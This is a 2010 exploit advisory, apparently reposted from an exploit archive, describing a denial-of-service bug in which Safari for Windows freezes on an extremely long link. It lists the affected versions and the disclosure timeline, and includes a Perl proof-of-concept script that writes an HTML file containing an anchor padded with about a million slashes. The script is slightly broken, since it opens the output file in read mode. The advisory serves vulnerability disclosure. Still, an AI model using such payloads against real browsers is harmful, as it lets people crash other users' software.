Safari for windows Long link DoS
Posted on 14 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Safari for windows Long link DoS</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================ Safari for windows Long link DoS ================================ ############################################ Safari for windows Long link DoS Vendor URL:http://www.apple.com/safari/ Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html Vendor notified:Yes exploit available: YES Category : remote DoS ############################################ Safari is prone vulnerable to Dos with a very long Link... This issue is exploitable via web links like <a href="very long URL"> click here</a> or similar vectors. Safari fails to render the link and it turn Frozen resulting in a Denial of service condition. ################# Versions Tested ################# I have tested this issue in win xp sp3 and a windows 7 fully pached. Win XP sp3: Safari 5.0.X vulnerable Safari 4.xx vulnerable windows 7 Ultimate: Safari 5.0.X vulnerable Safari 4.xx vulnerable ############ References ############ Discovered: 29-07-2010 vendor notify:31-07-2010 Vendor Response: Vendor patch: #################### Proof Of Concept #################### ####################################################################### #!/usr/bin/perl # safari Long "a href" Link DoS # Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com # Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS # generate the file open it with safari wait a seconds ###################################################################### $archivo = $ARGV[0]; if(!defined($archivo)) { print "Usage: $0 <archivo.html> "; } $cabecera = "<html>" . " "; $payload = "<a href="about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "">click here if you can :)</a>" . " "; $fin = "</html>"; $datos = $cabecera . $payload . $fin; open(FILE, '<' . $archivo); print FILE $datos; close(FILE); exit; ################## EOF ###################### ############## Related Links ############## vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251 Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474 Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776 ###################### €nd ############################# Thnx to Phreak for support and let me undestanding the nature of this bug thnx to jajoni for test it in windows 7 X64 bits version. -- atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente.... # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-14]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
